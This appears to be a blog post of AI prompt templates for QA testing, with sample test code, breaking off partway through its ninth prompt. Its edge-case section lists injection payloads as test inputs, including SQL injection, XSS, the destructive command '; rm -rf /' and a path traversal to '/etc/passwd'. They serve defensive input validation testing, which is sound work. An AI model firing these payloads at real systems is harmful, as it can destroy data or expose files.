Prompt Engineering · Intermediate · 42 min read

Quality Assurance Supercharged: AI Prompts for QA Engineers

Master QA with 15 AI prompts for test case generation, bug reporting, automation scripts, and security testing. Streamline your testing workflow today.

qa · testing · quality assurance · test automation · bug reporting · AI prompts

I’ll never forget my first bug that slipped into production. It was a simple payment calculation error—off by one cent on large orders. The finance team caught it. The CEO got an angry call from a major client. I got a post-mortem meeting and a newfound respect for thorough testing.

That was five years ago. Since then, I’ve learned that QA isn’t about finding bugs—it’s about building confidence. Every test you write, every edge case you consider, every automation script you create… it’s all about making sure that when you ship, you ship with confidence.

And here’s what I wish someone had told me earlier: AI prompts can multiply your testing effectiveness by 5x or more. Not by replacing your judgment, but by giving you frameworks and accelerating the tedious work. This post shares the 15 prompts I use almost every day as a QA engineer. If you want to dive deeper into prompt engineering fundamentals, check out our guide on becoming an AI prompt engineer.

Why QA Prompts Matter

The average QA engineer spends 40% of their time on repetitive tasks that could be templated or generated. Writing test cases. Creating bug reports. Generating test data. Writing automation scripts. With the right prompts, you can turn hours of work into minutes.

But here’s the catch: a bad test is worse than no test. It gives you false confidence. These prompts are designed to help you think systematically about testing, not to replace your critical thinking. Use them as a starting point, then apply your expertise.

Test Planning and Requirements Prompts

1. Acceptance Criteria to Test Cases

The gap between acceptance criteria and test cases is where bugs hide. Vague AC like “user should be able to log in” creates vague tests. Specific AC creates specific, verifiable tests. This prompt bridges that gap.

Purpose: Transform User Story Acceptance Criteria into comprehensive, verifiable test checklists
Use case: Converting user stories into testable scenarios


Prompt:

You are a QA Analyst. Your task is to transform User Story Acceptance Criteria into a comprehensive, verifiable test checklist.

CONTEXT
- User Story: {COPY THE USER STORY HERE}
- Acceptance Criteria: {LIST EACH AC ITEM}
- Feature Context: {ADDITIONAL CONTEXT ABOUT THE FEATURE}
- User Persona: {WHO IS THE END USER?}
- Definition of Done: {WHAT DOES "DONE" LOOK LIKE?}

AC TO TEST CASE MAPPING
- AC1: [acceptance criteria] | [test case] | [verification: Manual/Automated]
- AC2: [acceptance criteria] | [test case] | [verification method]
- AC3: [acceptance criteria] | [test case] | [verification method]

OUTPUT FORMAT - TEST CASE CHECKLIST
AC Ref | Test Case | Preconditions | Steps | Expected Result | Status
AC1 | | | | | Pass/Fail
AC2 | | | | |
AC3 | | | | |

AC Ref | Test Case | Screen | Expected Result | Browser/Device
| | | | |

AC Ref | Test Case | External System | Expected Behavior
| | | |

ACCEPTANCE CRITERIA COVERAGE MATRIX
AC | Covered By | Test ID | Notes
AC1 | | | |
AC2 | | | |
AC3 | | | |

GHERKIN FORMAT (Optional)
CODE:
Feature: [Feature name]

  Scenario: [Scenario name]
    Given [Precondition]
    When [Action]
    Then [Expected result]
END CODE

SUMMARY
Metric | Value
Total acceptance criteria |
Total test cases generated |
Criteria with full coverage |
Criteria needing clarification |

BEST PRACTICES
- Each AC should have at least one test
- Include positive AND negative tests
- Verify edge cases for critical ACs
- Ensure tests are actionable
- Link tests back to requirements

Customize it: Be specific about the feature context. The more background you provide, the better the test cases will cover real-world scenarios.

2. Manual Test Case Generator

I’ve reviewed thousands of test cases in my career. The difference between good and bad test cases is often the difference between catching bugs and missing them. A good test case has clear preconditions, specific steps, and verifiable expected results.

Purpose: Generate comprehensive step-by-step test cases for a feature requirement
Use case: Creating test case documentation before execution


Prompt:

You are a QA Test Engineer. Your task is to generate comprehensive step-by-step test cases for a feature requirement.

CONTEXT
- Feature: {DESCRIBE THE FEATURE IN DETAIL}
- Requirements: {LIST SPECIFIC REQUIREMENTS}
- Platform: {WEB/MOBILE/API/DESKTOP}
- User Roles: {WHAT USER TYPES EXIST?}
- Test Environment: {STAGING/DEV/QA ENVIRONMENT}

TEST CASE FRAMEWORK
Field | Description
Test ID | Unique identifier
Title | Clear test description
Preconditions | Setup required before test
Steps | Numbered action sequence
Expected Result | What should happen
Priority | P1/P2/P3
Category | Functional/Negative/Edge

TEST COVERAGE AREAS
Area | What to Test
Positive flow | Main happy path
Negative flow | Invalid inputs, errors
Boundary values | Min/max limits
Data types | Wrong formats
Permissions | Role-based access
UI/UX | Layout, responsiveness

OUTPUT FORMAT - TEST CASE SUITE
TC ID | Title | Preconditions | Steps | Expected Result | Priority
TC-001 | | | | | P1/P2/P3
TC-002 | | | | |
TC-003 | | | | |
TC-004 | | | | |
TC-005 | | | | |

POSITIVE TEST CASES
Test # | Description | Steps | Expected Result
1 | Happy path scenario | 1-5 steps | Main success path
2 | Alternative success path | 1-5 steps | Success variant

NEGATIVE TEST CASES
Test # | Description | Input | Expected Error
1 | Invalid input type | Wrong data type | Validation error shown
2 | Missing required field | Empty required field | Field required message
3 | Invalid format | Incorrect format | Format error message

EDGE CASES
Test # | Scenario | Why It's Edge
1 | Empty string | Boundary condition
2 | Max length input | Upper boundary
3 | Special characters | Encoding handling

SUMMARY
Metric | Count
Total test cases |
Positive tests |
Negative tests |
Edge cases |
P1 (Critical) |
P2 (High) |
P3 (Medium) |

BEST PRACTICES
- Each step should be actionable and atomic
- Expected results should be objectively verifiable
- Include cleanup steps where needed
- Group related tests together
- Prioritize based on risk and frequency of use

Customize it: Focus on the most critical user journeys first. Don’t try to test everything at once—prioritize.

3. Severity/Priority Classifier

One of the hardest skills in QA is accurately classifying bugs. Over-prioritize and you mask real critical issues. Under-prioritize and production breaks. This prompt gives you a systematic framework for classification.

Purpose: Analyze bug reports and assign appropriate severity and priority levels
Use case: Triage and classification of incoming bugs


Prompt:

You are a Bug Triage Specialist. Your task is to analyze bug reports and assign appropriate severity and priority levels.

CONTEXT
- Bug Impact: {DESCRIBE THE IMPACT ON USERS}
- Frequency: {HOW OFTEN DOES IT OCCUR - 100%, intermittent?}
- Affected Users: {PERCENTAGE OF USERS AFFECTED}
- Workaround Available: {IS THERE A WAY AROUND THIS BUG?}
- Business Criticality: {HOW CRITICAL IS THE AFFECTED FEATURE?}

SEVERITY LEVELS
Level | Definition | User Impact | Example
Critical | System down, data loss | Cannot work at all | Login broken, data corrupted
High | Major feature broken | Significant impact | Checkout fails, payments broken
Medium | Feature impaired | Some impact | Search slow, UI glitch
Low | Minor issue | Minimal impact | Typo, spacing issue

PRIORITY LEVELS
Priority | Definition | Fix Timeline | Criteria
P1 | Urgent | 24 hours | Critical bug, all users affected
P2 | High | 1 week | High severity, many users affected
P3 | Normal | 2 weeks | Medium severity, workaround exists
P4 | Low | Next release | Low severity, cosmetic issue

OUTPUT FORMAT - CLASSIFICATION MATRIX
Criteria | Critical | High | Medium | Low
User impact | Can't work | Major issue | Minor issue | Cosmetic
Revenue impact | Lost revenue | Significant | Minimal | None
Data loss | Yes | Potential | No | No
Security | Breach | Vulnerability | None | None
Workaround | None | Complex | Easy | N/A

DECISION TREE - SEVERITY ASSESSMENT
CODE:
Is the system/application unusable?
├── YES → Critical
└── NO → Is a major feature broken?
    ├── YES → High
    └── NO → Is functionality impaired?
        ├── YES → Medium
        └── NO → Low
END CODE

DECISION TREE - PRIORITY ASSESSMENT
CODE:
Is this affecting all users in production?
├── YES → P1
└── NO → Is there a workaround?
    ├── NO → P2
    └── YES → Is it blocking many users?
        ├── YES → P2
        └── NO → When should we fix?
            ├── This sprint → P3
            └── Next release → P4
END CODE

CLASSIFICATION RESULT
Field | Value
Bug ID |
Suggested Severity |
Suggested Priority |
Rationale |

IMPACT ANALYSIS
Dimension | Assessment | Details
User Impact | |
Business Impact | |
Frequency | |
Workaround | |

RECOMMENDED ACTIONS
Priority | Action
P1 | Immediate hotfix, notify stakeholders
P2 | Fix in current sprint, inform users
P3 | Normal backlog, schedule fix
P4 | Backlog, fix when time permits

BEST PRACTICES
- Be consistent across all bugs
- Consider both user impact AND business impact
- Document your rationale
- Reassess as new information emerges
- Align with any SLA requirements

Customize it: Be honest about the impact. It’s easy to overestimate severity when you’re the one who found the bug.
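
A quick way to make this classification consistent is to encode the decision trees from the prompt directly into your triage tooling. Here is a minimal TypeScript sketch of the severity tree; the input shape is an assumption I made for illustration, so map the fields to whatever your bug tracker actually captures.

CODE:
// Severity decision tree from the prompt above, encoded as a helper.
// The BugFacts shape is a hypothetical input format for illustration.
type BugFacts = {
  systemUnusable: boolean;
  majorFeatureBroken: boolean;
  functionalityImpaired: boolean;
};

type Severity = 'Critical' | 'High' | 'Medium' | 'Low';

function classifySeverity(facts: BugFacts): Severity {
  if (facts.systemUnusable) return 'Critical';
  if (facts.majorFeatureBroken) return 'High';
  if (facts.functionalityImpaired) return 'Medium';
  return 'Low';
}

// Example: checkout is broken for everyone, but the rest of the app still works.
console.log(classifySeverity({
  systemUnusable: false,
  majorFeatureBroken: true,
  functionalityImpaired: true,
})); // "High"
END CODE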

4. Regression Test Suite Selector

Here’s a truth no one tells you in QA training: running all tests every time is impossible at scale. The key skill is knowing which tests to run based on what changed. This prompt helps you make that decision systematically.

Purpose: Identify which tests to run based on code changes
Use case: Determining regression test scope for a given change


Prompt:

You are a Regression Testing Strategist. Your task is to identify which tests to run based on code changes.

CONTEXT
- Changed Files: {LIST FILES THAT CHANGED}
- Changed Components: {WHAT COMPONENTS WERE MODIFIED?}
- Test Coverage Map: {IF YOU HAVE A TEST-MATRIX, DESCRIBE IT}
- Test Suite Size: {HOW MANY TESTS TOTAL?}
- Time Constraint: {HOW MUCH TIME DO YOU HAVE?}

REGRESSION TESTING APPROACHES
Approach | Coverage | Time | When to Use
Full suite | 100% | Long | Major release
Affected only | ~60% | Medium | Small changes
Critical path | ~30% | Short | Hotfix, time crunch
Risk-based | Variable | Variable | Most common scenario

OUTPUT FORMAT - CHANGED FILES ANALYSIS
File | Component | Tests Affected
| | |
| | |

RISK ASSESSMENT
Component | Change Type | Risk Level | Tests Needed
| Bug fix | High/Med/Low |
| New feature | High |
| Refactor | Medium |
| Config change | Low |

RECOMMENDED TEST SUITE
Critical Path Tests (Must Run)
Test Name | Component | Why Critical
| | Core functionality
| |

Affected Feature Tests
Test Name | Component | Triggered By
| | File changed
| |

Integration Tests
Test Name | Components | Why Run
| | Interface testing
| |

TEST SELECTION SUMMARY
Category | Count | Time Estimate
Critical path |
Unit tests |
Integration tests |
E2E tests |
Total |

EXECUTION ORDER (Priority)
1. Run critical path tests first
2. Follow with affected feature tests
3. End with lower priority tests

RECOMMENDED COVERAGE
Test Type | Coverage | Reason
Unit tests | % | Fast, catches regressions
Integration | % | Catches interface issues
E2E tests | % | User journey validation
Smoke tests | 100% | Basic sanity check

BEST PRACTICES
- Always run critical path tests first
- Automate test selection when possible
- Maintain a current test matrix
- Prioritize tests by potential failure impact
- Consider test execution time
- Document test rationale
- Review and update regularly

Customize it: Be conservative about risk. If you’re unsure, err on the side of running more tests.
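
If you want to automate part of this selection, a small script can map changed files to test tags and kick off only those suites. The sketch below is TypeScript for a Node environment; the directory-to-tag mapping, the tag names, and the Playwright --grep invocation are assumptions you would replace with your own project structure.

CODE:
// Hypothetical sketch: select regression suites from the files changed on a branch.
import { execSync } from 'node:child_process';

// Assumed mapping from source directories to test tags.
const componentTags: Record<string, string> = {
  'src/checkout/': '@checkout',
  'src/auth/': '@auth',
  'src/search/': '@search',
};

// Files changed relative to the main branch (assumes a git checkout).
const changedFiles = execSync('git diff --name-only origin/main...HEAD')
  .toString()
  .split('\n')
  .filter(Boolean);

// Always include the critical path, then add tags for touched components.
const tags = new Set<string>(['@critical-path']);
for (const file of changedFiles) {
  for (const [prefix, tag] of Object.entries(componentTags)) {
    if (file.startsWith(prefix)) tags.add(tag);
  }
}

// Run only the selected suites, e.g. with Playwright's --grep filter.
execSync(`npx playwright test --grep "${[...tags].join('|')}"`, { stdio: 'inherit' });
END CODE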

Test Execution Prompts

5. Edge Case Brainstormer

The best QA engineers I know think like malicious users. They ask “what happens if…” constantly. This prompt helps you systematically identify edge cases you might otherwise miss.

Purpose: Identify unusual inputs, boundary conditions, and unexpected user behaviors
Use case: Thinking through edge cases before or during testing


Prompt:

You are a Creative QA Specialist. Your task is to identify unusual inputs, boundary conditions, and unexpected user behaviors that could break an application.

CONTEXT
- Component: {FORM/INPUT/FEATURE/API/UI ELEMENT}
- Expected Input: {WHAT INPUT IS THIS COMPONENT EXPECTING?}
- Input Type: {TEXT/NUMBER/DATE/FILE/UPLOAD}
- Constraints: {WHAT ARE THE CONSTRAINTS?}
- User Scenario: {HOW DO USERS TYPICALLY USE THIS?}

EDGE CASE CATEGORIES
Category | Examples | Why It Matters
Boundary values | 0, -1, max, empty, null | Limit behavior often breaks
Data types | Wrong types, null, undefined | Type safety issues
Special characters | SQLi, XSS, emojis | Security/encoding issues
Unicode | Non-ASCII, RTL, zero-width | Internationalization
Timing | Race conditions, timeouts | Concurrency problems
State | Logged out, expired, cached | Session handling
Network | Offline, slow, interrupted | Resilience testing
Volume | Large files, many items | Performance issues

OUTPUT FORMAT - IDENTIFIED EDGE CASES
# | Category | Scenario | Test Approach
1 | Boundary | Empty string | Verify handling
2 | Boundary | Max length +1 | Verify truncation
3 | Type | Wrong type | Verify validation
| | | |

INPUT BOUNDARY TESTS
Value | Type | Expected Behavior
Empty string | Boundary |
Single character | Boundary |
Max length | Boundary |
Max + 1 | Boundary |
Zero | Boundary |
Negative | Boundary |
Special chars | Character |
Unicode | Character |
SQL injection | Security |
XSS payload | Security |

UNHAPPY PATH SCENARIOS
Scenario | Trigger | Expected Behavior
User provides null | Null input | Graceful handling
User provides undefined | Undefined value | Error message shown
User provides array instead of string | Wrong type | Validation error
Whitespace only | Empty spaces | Strip or validate
Leading/trailing spaces | String input | Handle correctly
HTML tags | User input | Sanitize/escape
Script tags | User input | Block/sanitize

WEIRD USER BEHAVIORS
Behavior | Description | Test For
Rapid clicking | Double/triple submit | Duplicate submissions
Copy/paste weird content | From PDF/doc | Formatting issues
Autofill unexpected data | Browser autocomplete | Wrong data accepted
Session timeout during action | Expired session | Handle gracefully
Back button mid-flow | Cached state | State consistency
Multiple tabs | Concurrent sessions | Data sync issues

SECURITY EDGE CASES
Payload Type | Example | Check For
SQL Injection | ' OR '1'='1 | Database exposure
XSS | <script>alert(1)</script> | Script execution
Command Injection | ; rm -rf / | OS command execution
Path traversal | ../../../etc/passwd | File access
LDAP injection | *)(uid=*)) | Directory exposure

API-SPECIFIC EDGE CASES
Scenario | Request | Expected Response
Missing auth header | No Authorization | 401 Unauthorized
Expired token | Expired JWT | 401 Unauthorized or 403 Forbidden
Wrong HTTP method | GET instead of POST | 405 Method Not Allowed
Malformed JSON | Invalid JSON | 400 Bad Request
Oversized payload | Too much data | 413 Payload Too Large
Rate limit hit | Too many requests | 429 Too Many Requests

BEST PRACTICES
- Think like a malicious user
- Consider all data types and states
- Test at system boundaries
- Include edge cases in regression
- Document all findings
- Share learnings with developers

Customize it: Focus on edge cases relevant to your specific component. A form field needs different edge case testing than an API endpoint.
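
Once the prompt has produced a list of edge cases, table-driven tests keep them cheap to maintain. Here is a small Jest sketch in TypeScript; validateUsername and its expected outcomes are hypothetical, so swap in your own function and rules.

CODE:
// Table-driven edge-case tests for a hypothetical validateUsername() helper.
import { describe, it, expect } from '@jest/globals';
import { validateUsername } from './validateUsername'; // hypothetical module

const edgeCases = [
  { label: 'empty string', input: '', valid: false },
  { label: 'whitespace only', input: '   ', valid: false },
  { label: 'max length (64 chars)', input: 'a'.repeat(64), valid: true },
  { label: 'max length + 1', input: 'a'.repeat(65), valid: false },
  { label: 'emoji', input: 'user🙂', valid: false },
  { label: 'SQL injection attempt', input: "' OR '1'='1", valid: false },
  { label: 'script tag', input: '<script>alert(1)</script>', valid: false },
];

describe('validateUsername edge cases', () => {
  it.each(edgeCases)('$label', ({ input, valid }) => {
    expect(validateUsername(input)).toBe(valid);
  });
});
END CODE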

6. Performance Scenario Generator

Performance bugs are different from functional bugs. Your application might work perfectly with one user but collapse under load. This prompt helps you plan performance tests that matter. According to the National Institute of Standards and Technology, performance testing should be integrated early in the development cycle for optimal results.

Purpose: Define load testing scenarios for performance validation
Use case: Planning performance and load tests


Prompt:

You are a Performance Testing Specialist. Your task is to define load testing scenarios for performance validation.

CONTEXT
- Test Tool: {JMETER/K6/GATLING/LOCUST}
- Target System: {API/UI/FullSystem}
- Performance Goals: {WHAT ARE YOUR TARGETS?}
- Test Duration: {HOW LONG SHOULD TESTS RUN?}
- Test Data: {WHAT DATA DO YOU NEED?}

LOAD TESTING FRAMEWORK
Load Pattern | Use Case | Description
Steady state | Baseline | Constant load
Ramp up | Warm up | Gradually increase load
Spike | Stress test | Sudden burst of users
Soak | Endurance | Long duration testing
Peak | Capacity | Maximum expected load

KEY METRICS
Metric | Description | Target
Response time | Time for response | < X ms
Throughput | Requests per second | > X RPS
Error rate | Failed requests | < X%
Concurrent users | Simultaneous users | X users
P95/P99 | Percentile response | < X ms

OUTPUT FORMAT - SCENARIO DEFINITION
Scenario: [Name]
Description | [What this scenario tests]
Duration | [How long]
Target RPS | [Requests per second]
Concurrent Users | [Number of users]

LOAD PROFILE
Phase | Duration | Users | Ramp | Purpose
Warmup | | 0 → X | gradual | Initialize system
Steady | | X | none | Baseline measurement
Peak | | X → Y | ramp | Stress test
Cooldown | | Y → 0 | gradual | Wind down

JMETER SCENARIO (Template)
CODE:
Test Plan:
  Thread Group:
    - Number of Threads (Users): [USERS]
    - Ramp-up Period: [SECONDS]
    - Loop Count: [NUMBER]
    - CSV Data Set:
      Filename: [FILE]
      Variable Names: [VARS]

    HTTP Request:
      - Server: [HOST]
      - Path: [PATH]
      - Method: [METHOD]

    Listeners:
      - View Results Tree
      - Summary Report
      - Response Times Over Time
END CODE

K6 SCENARIO (Template)
CODE:
import http from 'k6/http';
import { check, sleep } from 'k6';

export const options = {
  stages: [
    { duration: '[WARMUP]', target: [USERS] },
    { duration: '[STEADY]', target: [USERS] },
    { duration: '[PEAK]', target: [MAX_USERS] },
    { duration: '[COOLDOWN]', target: 0 },
  ],
  thresholds: {
    http_req_duration: ['p(95)<[MS]'],
    http_req_failed: ['rate<[RATE]'],
  },
};

export default function() {
  const payload = JSON.stringify({});
  const params = { headers: { 'Content-Type': 'application/json' } };

  const res = http.[METHOD]('[URL]', payload, params);

  check(res, { 'status is 200': (r) => r.status === 200 });
  sleep(1);
}
END CODE

LOAD PARAMETERS
Phase | Users | Duration | RPS Target
Warmup | 0 → X | |
Baseline | X | |
Stress | X → Y | |
Peak | Y | |
Cooldown | Y → 0 | |

SUCCESS CRITERIA
Metric | Target | Threshold | Status
Avg Response | < X ms | | ☐ Pass
P95 Response | < X ms | | ☐ Pass
P99 Response | < X ms | | ☐ Pass
Throughput | > X RPS | | ☐ Pass
Error Rate | < X% | | ☐ Pass

RESOURCE MONITORING
Resource | Warning | Critical
CPU | > 70% | > 90%
Memory | > 80% | > 95%
Disk I/O | > 70% | > 90%
Network | > 80% | > 95%

BEST PRACTICES
- Always warm up the system first
- Use realistic test data
- Monitor server resources during tests
- Run multiple iterations for consistency
- Test at expected peak load
- Document all thresholds
- Test failure scenarios too

Customize it: Set realistic targets based on your SLAs and known system capacity.
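
To make the k6 template concrete, here is what it looks like with the placeholders filled in. The endpoint, stage durations, and thresholds are illustrative assumptions, not recommendations; set them from your own SLAs and the success criteria table above.

CODE:
// Filled-in example of the k6 template above. Run with: k6 run load-test.js
import http from 'k6/http';
import { check, sleep } from 'k6';

export const options = {
  stages: [
    { duration: '2m', target: 50 },   // warm up to 50 virtual users
    { duration: '5m', target: 50 },   // hold steady for a baseline
    { duration: '2m', target: 200 },  // ramp to peak load
    { duration: '2m', target: 0 },    // cool down
  ],
  thresholds: {
    http_req_duration: ['p(95)<500'], // 95% of requests under 500 ms
    http_req_failed: ['rate<0.01'],   // error rate under 1%
  },
};

export default function () {
  const res = http.get('https://staging.example.com/api/products');
  check(res, { 'status is 200': (r) => r.status === 200 });
  sleep(1);
}
END CODE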

Automation Prompts

7. Unit Test Writer

Unit tests are your first line of defense. They’re fast, they’re isolated, and they catch regressions before they propagate. This prompt generates comprehensive unit tests for your functions. For more automation patterns, see our AI agent code patterns guide.

Purpose: Write isolated, comprehensive unit tests for provided functions
Use case: Generating unit tests for new or existing code


Prompt:

You are a Unit Test Specialist. Your task is to write isolated, comprehensive unit tests for provided functions.

CONTEXT
- Language: {JAVASCRIPT/PYTHON/TYPESCRIPT}
- Framework: {JEST/PYTEST/VITEST}
- Function/Class: {PASTE THE CODE TO TEST}
- Dependencies: {LIST EXTERNAL DEPENDENCIES}
- Mock Requirements: {WHAT NEEDS TO BE MOCKED?}

UNIT TEST FRAMEWORK
Jest Structure Template
CODE:
describe('Module/Function', () => {
  beforeAll(() => { /* setup */ })
  beforeEach(() => { /* reset */ })
  afterEach(() => { /* cleanup */ })
  afterAll(() => { /* teardown */ })

  describe('positive cases', () => {
    it('should [EXPECTED_BEHAVIOR]', () => {
      const result = functionName(input)
      expect(result).toEqual(expected)
    })
  })

  describe('negative cases', () => {
    it('should throw [ERROR] for [INPUT]', () => {
      expect(() => functionName(input)).toThrow()
    })
  })
})
END CODE

PyTest Structure Template
CODE:
import pytest
from module import function_name

class TestModule:
    def setup_method(self):
        """Setup"""
        pass

    def test_[TEST_NAME](self):
        """Test description"""
        result = function_name(input)
        assert result == expected

    def test_[NEGATIVE](self):
        """Negative test"""
        with pytest.raises(ExpectedException):
            function_name(invalid_input)
END CODE

OUTPUT FORMAT - TEST SUITE STRUCTURE
Happy Path Tests
Test Name | Input | Expected | Reason
test_returns_correct_type | | | Verify type
test_handles_valid_input | | | Core functionality
test_processes_multiple_items | | | Batch handling

Edge Case Tests
Test Name | Input | Expected | Reason
test_handles_empty_input | "" or [] | Error or default | Null safety
test_handles_undefined | undefined | Error or default | Undefined handling
test_handles_null | null | Error or default | Null value handling
test_handles_whitespace | " " | Trimmed string | String trimming
test_handles_special_chars | Special chars | Handled correctly | Encoding

Error Handling Tests
Test Name | Input | Expected Error | Message
test_throws_on_invalid | | TypeError |
test_returns_default_on_error | | | Fallback value

Boundary Tests
Test Name | Input | Expected | Reason
test_min_value | | | Lower boundary
test_max_value | | | Upper boundary
test_negative_boundary | | | Negative values
test_zero_boundary | | | Zero value

MOCK CONFIGURATION
Jest mocks template
CODE:
jest.mock('dependency', () => ({
  method: jest.fn(),
  anotherMethod: jest.fn().mockReturnValue(value)
}))
END CODE

COVERAGE AREAS
Category | Covered | Notes
Happy path | ☐ |
Error cases | ☐ |
Edge cases | ☐ |
Boundary tests | ☐ |

BEST PRACTICES
- Test one thing per test
- Use descriptive test names
- Follow Arrange-Act-Assert pattern
- Avoid test interdependence
- Mock external dependencies
- Aim for meaningful coverage
- Test behavior, not implementation

Customize it: Provide the actual code you want to test. The more context about edge cases and error handling, the better the tests.
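
Here is the kind of output I expect from this prompt, using Jest and a hypothetical calculateOrderTotal(items, taxRate) helper. The function, its rounding behavior, and the expected values are assumptions chosen to echo the one-cent payment bug from the intro; the structure is what matters.

CODE:
// Unit tests for a hypothetical calculateOrderTotal(items, taxRate) helper.
import { describe, it, expect } from '@jest/globals';
import { calculateOrderTotal } from './calculateOrderTotal'; // hypothetical module

describe('calculateOrderTotal', () => {
  describe('positive cases', () => {
    it('sums line items and applies tax', () => {
      const items = [{ price: 19.99, qty: 2 }, { price: 5.0, qty: 1 }];
      // (19.99 * 2 + 5.00) * 1.1 = 49.478, rounded to cents
      expect(calculateOrderTotal(items, 0.1)).toBeCloseTo(49.48, 2);
    });
  });

  describe('boundary cases', () => {
    it('returns 0 for an empty cart', () => {
      expect(calculateOrderTotal([], 0.1)).toBe(0);
    });

    it('does not drift by a cent on large orders', () => {
      const items = [{ price: 0.105, qty: 1000 }];
      expect(calculateOrderTotal(items, 0)).toBeCloseTo(105.0, 2);
    });
  });

  describe('negative cases', () => {
    it('throws on a negative quantity', () => {
      expect(() => calculateOrderTotal([{ price: 10, qty: -1 }], 0.1)).toThrow();
    });
  });
});
END CODE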

8. Cypress/Playwright Script Writer

End-to-end tests simulate real user journeys. They’re slower and more brittle than unit tests, but they catch the bugs that matter—bugs users would actually encounter. This prompt writes E2E test scripts for you. The official Playwright documentation and Cypress guides provide additional best practices for structuring your test suites.

Purpose: Write complete, executable E2E test scripts for user flows
Use case: Automating user journey tests


Prompt:

You are an E2E Test Automation Engineer. Your task is to write complete, executable E2E test scripts for user flows.

CONTEXT
- User Flow: {DESCRIBE THE USER JOURNEY}
- Test Steps: {LIST THE STEPS IN ORDER}
- Test Data: {WHAT DATA IS NEEDED?}
- Assertions: {WHAT SHOULD WE VERIFY?}
- Framework: {CYPRESS/PLAYWRIGHT}
- Base URL: {BASE URL FOR TESTING}

E2E TEST FRAMEWORK
Common Commands (Cypress)
Command | Purpose
cy.visit() | Navigate to URL
cy.get() | Select element
cy.click() | Click element
cy.type() | Enter text
cy.should() | Assertion

Common Commands (Playwright)
Command | Purpose
page.goto() | Navigate to URL
page.locator() | Select element
page.click() | Click element
page.fill() | Enter text
expect() | Assertion

OUTPUT FORMAT - CYPRESS TEST SCRIPT
CODE:
describe('User Flow: [FLOW_NAME]', () => {
  beforeEach(() => {
    // Setup
    cy.visit('[BASE_URL]')
  })

  it('should complete [SCENARIO_NAME]', () => {
    // Step 1: [ACTION]
    cy.get('[SELECTOR]').should('be.visible')

    // Step 2: [ACTION]
    cy.get('[SELECTOR]').click()

    // Step 3: [ACTION]
    cy.get('[SELECTOR]').type('[INPUT]')

    // Step 4: [ACTION]
    cy.get('[SELECTOR]').click()

    // Assertion
    cy.get('[RESULT_SELECTOR]')
      .should('be.visible')
      .and('contain', '[EXPECTED_TEXT]')
  })

  it('should handle [NEGATIVE_SCENARIO]', () => {
    // Negative test scenario
  })
})
END CODE

OUTPUT FORMAT - PLAYWRIGHT TEST SCRIPT
CODE:
import { test, expect } from '@playwright/test';

test.describe('User Flow: [FLOW_NAME]', () => {
  test.beforeEach(async ({ page }) => {
    await page.goto('[BASE_URL]');
  });

  test('should complete [SCENARIO_NAME]', async ({ page }) => {
    // Step 1: [ACTION]
    await expect(page.locator('[SELECTOR]')).toBeVisible();

    // Step 2: [ACTION]
    await page.locator('[SELECTOR]').click();

    // Step 3: [ACTION]
    await page.locator('[SELECTOR]').fill('[INPUT]');

    // Step 4: [ACTION]
    await page.locator('[SELECTOR]').click();

    // Assertion
    await expect(page.locator('[RESULT_SELECTOR]'))
      .toBeVisible();
    await expect(page.locator('[RESULT_SELECTOR]'))
      .toContainText('[EXPECTED_TEXT]');
  });
});
END CODE

TEST DATA SETUP
CODE:
const testData = {
  user: {
    email: '[EMAIL]',
    password: '[PASSWORD]'
  },
  item: {
    name: '[ITEM]',
    quantity: [NUMBER]
  }
};
END CODE

ELEMENT SELECTORS
Element | Recommended Selector | Fallback Options
Button | data-testid | id, class
Input | name | id, label
Link | href | text

WAITS AND TIMEOUTS
Situation | Approach
Network idle | cy.intercept() / waitForResponse()
Element visible | .should('be.visible')
API call complete | Wait for response

BEST PRACTICES
- Use stable selectors (data-testid preferred)
- Avoid hardcoded sleeps
- Test happy path AND edge cases
- Clean up test data after tests
- Use page objects for complex flows
- Mock external services when needed

Customize it: Provide the actual selectors and steps. Replace placeholders with real element identifiers.
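
For reference, here is the Playwright template above filled in for a hypothetical login flow. The URL, data-testid values, and credentials are placeholders; swap them for your own.

CODE:
// Filled-in Playwright example for a hypothetical login flow.
import { test, expect } from '@playwright/test';

test.describe('User Flow: Login', () => {
  test.beforeEach(async ({ page }) => {
    await page.goto('https://staging.example.com/login');
  });

  test('should log in with valid credentials', async ({ page }) => {
    await page.getByTestId('email-input').fill('qa.user@example.com');
    await page.getByTestId('password-input').fill('correct-horse-battery');
    await page.getByTestId('login-button').click();

    // Landing on the dashboard is the success signal for this flow.
    await expect(page).toHaveURL(/\/dashboard/);
    await expect(page.getByTestId('welcome-banner')).toContainText('Welcome');
  });

  test('should show an error for a wrong password', async ({ page }) => {
    await page.getByTestId('email-input').fill('qa.user@example.com');
    await page.getByTestId('password-input').fill('wrong-password');
    await page.getByTestId('login-button').click();

    await expect(page.getByTestId('login-error')).toBeVisible();
  });
});
END CODE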

9. CSS Selector Finder

One of the most frustrating parts of E2E testing is finding stable selectors. This prompt analyzes your HTML and recommends the best selectors to use.

Purpose: Find the most robust, stable CSS selectors for HTML elements
Use case: Creating stable selectors for automation


Prompt:

You are a Test Automation Selector Specialist. Your task is to find the most robust, stable CSS selectors for HTML elements.

CONTEXT
- HTML Element: {PASTE THE HTML ELEMENT}
- Element Purpose: {WHAT DOES THIS ELEMENT DO?}
- Framework: {CYPRESS/PLAYWRIGHT/SELENIUM}
- Application Type: {SPA/TRADITIONAL}
- Unique Characteristics: {ANY DISTINGUISHING ATTRIBUTES?}

SELECTOR STRATEGY
Selector Priority (Best to Worst)
Priority | Type | Example | Pros | Cons
1 | data-testid | data-testid="submit-btn" | Stable | Requires adding attribute
2 | data-cy | data-cy="email-input" | Cypress native | Needs attribute
3 | ID | #login-button | Fast | May change frequently
4 | Name | [name="username"] | Semantic | Not always unique
5 | Class | .btn-primary | Common | Not unique
6 | Attribute | [type="email"] | Flexible | Verbose
7 | XPath | //div/span | Powerful | Brittle, avoid

OUTPUT FORMAT - SELECTOR ANALYSIS
Available Attributes
Attribute | Value | Usable | Confidence
id | | ☐ | High/Med/Low
name | | ☐ |
class | | ☐ |
data-* | | ☐ |
aria-* | | ☐ |

Recommended Selectors
Rank | Selector | Type | Confidence | Why
1 | | data-testid | High | Stable, intentional
2 | | ID | Medium | Fast but may change
3 | | Class | Low | May not be unique

Cypress Selectors
CODE:
// Primary (Recommended)
cy.get('[data-testid="[VALUE]"]')

// Alternative 1
cy.get('#[ID]')

// Alternative 2
cy.get('[NAME="[VALUE]"]')

// Alternative 3
cy.get('[ATTRIBUTE="VALUE"]')
END CODE

Playwright Selectors
CODE:
// Primary
page.getByTestId('[VALUE]')

// Alternative 1
page.locator('#[ID]')

// Alternative 2
page.locator('[NAME="[VALUE]"]')

// Alternative 3
